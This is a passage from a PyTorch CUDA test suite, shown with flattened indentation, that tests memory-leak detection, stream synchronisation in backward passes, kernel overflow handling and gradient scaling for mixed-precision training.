self.assertEqual(before_available_bytes, after_available_bytes)
_test(0)
if TEST_MULTIGPU:
_test(1)
# Test that wrap_with_cuda_memory_check successfully detects a leak.
# Skipped for ROCm; look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.randn(1024, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 0.+"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.randn(1024, device=torch.device("cuda:1")))
with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 1.+"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
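# _amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
# multiplies each grad by inv_scale in place and sets found_inf to 1.0 if any
# inf/nan is encountered. With grads full of 4.0 and inv_scale 0.25, a
# successful unscale should leave every grad equal to 1.0.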
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non-overlapping and dense
# - variants of g.clone()[:, :5] which are not non-overlapping and dense
# Non-overlapping and dense grads route into a multi-tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to the single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected; ensure unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# An inf was injected; ensure it was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
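# _amp_update_scale_ implements the GradScaler update rule checked below:
# after growth_interval consecutive iterations without inf/nan the scale is
# multiplied by the growth factor and the tracker resets, while a skipped
# iteration multiplies the scale by the backoff factor and resets the tracker.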
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
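# Gradient accumulation: step()/update() only run every iters_to_accumulate
# iterations, so with 4 batches and iters_to_accumulate=2 the scale is grown
# twice and never backed off (unskipped=2, skipped=0); no inf is injected here.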
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
